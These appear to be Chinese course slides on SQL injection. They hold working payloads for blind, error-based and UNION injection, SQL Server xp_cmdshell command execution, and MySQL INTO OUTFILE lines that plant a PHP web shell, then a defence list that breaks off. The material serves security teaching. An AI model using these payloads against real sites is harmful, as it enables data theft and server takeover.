SQL注入攻擊與防御課件

SQL注入攻擊與防御SQL注入圖像、語(yǔ)音、文字等數(shù)據(jù)(Data)在計(jì)算機(jī)系統(tǒng)中，各種字母、數(shù)字符號(hào)的組合、語(yǔ)音、圖形、圖像等統(tǒng)稱(chēng)為數(shù)據(jù)。Access、MSSQL、Oracle、SQLITE、MySQL等數(shù)據(jù)庫(kù)(Database)數(shù)據(jù)庫(kù)是按照數(shù)據(jù)結(jié)構(gòu)來(lái)組織、存儲(chǔ)和管理數(shù)據(jù)的“倉(cāng)庫(kù)”。Access、MSSQL、Oracle、SQLITE、MySQL等數(shù)據(jù)庫(kù)管理系統(tǒng)(DBMS)數(shù)據(jù)庫(kù)管理系統(tǒng)(databasemanagementsystem)是一種操縱和管理數(shù)據(jù)庫(kù)的軟件，用于建立、使用和維護(hù)數(shù)據(jù)庫(kù)。它對(duì)數(shù)據(jù)庫(kù)進(jìn)行統(tǒng)一的管理和控制，以保證數(shù)據(jù)庫(kù)的安全性和完整性。DQL、DDL、DML、TCL、DCL結(jié)構(gòu)化查詢(xún)語(yǔ)言(SQL)結(jié)構(gòu)化查詢(xún)語(yǔ)言(StructuredQueryLanguage)簡(jiǎn)稱(chēng)SQL，結(jié)構(gòu)化查詢(xún)語(yǔ)言是一種數(shù)據(jù)庫(kù)查詢(xún)和程序設(shè)計(jì)語(yǔ)言，用于存取數(shù)據(jù)以及查詢(xún)、更新和管理關(guān)系數(shù)據(jù)庫(kù)系統(tǒng)。SQL注入這是一個(gè)Access數(shù)據(jù)庫(kù)SQL注入漏洞介紹

由于程序中對(duì)用戶輸入檢查不嚴(yán)格，用戶可以提交一段數(shù)據(jù)庫(kù)查詢(xún)代碼，根據(jù)程序返回的結(jié)果，獲得某些他想得知的數(shù)據(jù)，這就是所謂的SQLInjection，即SQL注入。原因分析

其本質(zhì)是由于對(duì)輸入檢查不充分，導(dǎo)致SQL語(yǔ)句將用戶提交的非法數(shù)據(jù)當(dāng)作語(yǔ)句的一部分來(lái)執(zhí)行。SQL注入SQL注入分類(lèi)：按提交字符類(lèi)型可分為：數(shù)字型

字符型

搜索型按HTTP提交方式可分為：GET、POST、Cookie按注入方式可分為：盲注、

union注入、報(bào)錯(cuò)注入、基于時(shí)間注入編碼問(wèn)題：寬字節(jié)注入SQL注入如何判斷？1.單引號(hào)判斷2.數(shù)字型注入判斷①and1=1and1=2and1isnulland1isnotnullanduser>0②參數(shù)進(jìn)行運(yùn)算+1-1'+'→'%2B'3.字符型注入判斷①'and'1'='1'and'1'='24.搜索型注入判斷①test%'and1=1and'%'='test%'and1=2and'%'='SQL注入如何攻擊？Access→盲注andexists(select*fromtable)andexists(selectcolumnfromtable)and(selecttop1len(id)fromadmin)>0and(selecttop1asc(mid(id,1,1))fromadmin)>X無(wú)差異→構(gòu)造差異andiif((1=1),2,'a')=2andiif((1=2),2,'a')=2SQL注入如何判斷權(quán)限？1.有錯(cuò)誤回顯①anduser>0

2.無(wú)錯(cuò)誤回顯①and1=(selectis_member('dbo'))//網(wǎng)頁(yè)返回正常，說(shuō)明數(shù)據(jù)庫(kù)管理權(quán)限為sa②and1=(selectis_member('db_owner'))//網(wǎng)頁(yè)返回正常，說(shuō)明數(shù)據(jù)庫(kù)管理權(quán)限為db_owner③and1=(selectis_member('public'))//網(wǎng)頁(yè)返回正常，說(shuō)明數(shù)據(jù)庫(kù)管理權(quán)限為publicSQL注入SqlServer→報(bào)錯(cuò)當(dāng)前數(shù)據(jù)庫(kù)有哪些表and(selecttop1namefromsysobjects)=1and(selecttop1namefromsysobjectswherenamenotin('admin','bigclass'))=1表中的字段and(selecttop1col_name(object_id('admin'),1)fromsysobjects)=1字段的值and(selecttop1passwordfromadmin)=1SQL注入SqlServer(sa權(quán)限)→關(guān)閉錯(cuò)誤提示執(zhí)行命令得到回顯①win2003execmaster..xp_cmdshell'netuser>C:\Inetpub\wwwroot\cmd.txt'--②win2000execmaster..xp_cmdshell'netuser>C:\Inetpub\wwwroot\cmd.txt--SQL注入MySQL注入獲取查詢(xún)的字段數(shù)→orderbyN數(shù)據(jù)庫(kù)名→and1=2unionselect1,SCHEMA_NAMEfrominformation_schema.SCHEMATAlimitN,1表名→and1=2unionselect1,TABLE_NAMEfrominformation_schema.TABLESwhereTABLE_SCHEMA=庫(kù)HEX值limitN,1字段→and1=2unionselect1,COLUMN_NAMEfrominformation_schema.COLUMNSwhereTABLE_NAME=表名HEX值limitN,1連接字段→group_concat()SQL注入MySQL通用報(bào)錯(cuò)and(select1from(selectcount(*),concat(version(),floor(rand(0)*2))xfrominformation_schema.tablesgroupbyx)a)%23SQL注入MySQL寫(xiě)文件①必須知道網(wǎng)站的絕對(duì)路徑，這樣才能寫(xiě)對(duì)目錄；②Mysql的版本在4.0以上，才能使用union進(jìn)行聯(lián)合查詢(xún)；③PHP配置文件php.ini中的magic_quotes_gpc=off，沒(méi)有對(duì)單引號(hào)進(jìn)行過(guò)濾；④Mysql數(shù)據(jù)庫(kù)當(dāng)前用戶擁有file_priv權(quán)限；⑤“Network”組的用戶對(duì)網(wǎng)站目錄有寫(xiě)權(quán)（windows操作系統(tǒng)下網(wǎng)站目錄一般都具有該權(quán)限）。SQL注入MySQL寫(xiě)文件/test.php?id=6and1=2unionselect1,2,'<?phpsystem($_REQUEST[cmd]);?>',4,5,6intooutfile'C:/apache/htdocs/site/shell.php'導(dǎo)出shell的新方式，不需要union協(xié)助select*fromtablelimit1intooutfile"d:/test.txt"linesterminatedby"<?phpeval($cmd)?>"SQL注入自動(dòng)化注入工具→PangolinSQL注入如何防范？①對(duì)進(jìn)入數(shù)據(jù)庫(kù)的特殊字符（'"\尖括號(hào)&*;等）進(jìn)行轉(zhuǎn)義處理，或編碼轉(zhuǎn)換。②嚴(yán)格限制變量類(lèi)型，比如整型變量就采用intval()函數(shù)過(guò)濾，數(shù)據(jù)庫(kù)中的存儲(chǔ)字段必須對(duì)應(yīng)為int型。③數(shù)據(jù)長(zhǎng)度應(yīng)該嚴(yán)格規(guī)定，能在一定程度上防止比較長(zhǎng)的SQL注入語(yǔ)句無(wú)法正確執(zhí)行。④